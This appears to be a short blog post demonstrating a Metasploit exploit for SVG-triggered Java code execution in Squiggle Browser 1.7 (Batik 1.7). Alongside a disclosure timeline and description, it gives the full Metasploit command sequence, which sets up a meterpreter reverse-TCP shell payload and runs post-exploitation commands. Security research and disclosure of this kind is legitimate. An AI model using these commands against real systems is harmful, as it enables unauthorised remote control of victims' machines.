aka wow on ZATAZ.com
Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo
Timeline :
Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire the 2012-05-11
Metasploit PoC provided the 2012-05-17
PoC provided by :
Nicolas Gregoire
sinn3r
juan vazquez
Reference(s) :
Affected version(s) :
Squiggle Browser 1.7
Batik framework 1.7
Tested on Mac OS X 10.7.1 with :
Squiggle Browser 1.7
Description :
This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted svg file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The “Enforce secure scripting” check must be disabled. The module has been tested against Windows and Linux platforms.
Commands :
use exploit/multi/misc/batik_svg_java set SRVHOST 192.168.178.100 set PAYLOAD java/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit getuid sysinfo
I recommend you to read these related posts
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo
- CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
- CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo
- Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo
- Java RMI Server Insecure Default Configuration Java Code Execution
- CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
- CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection
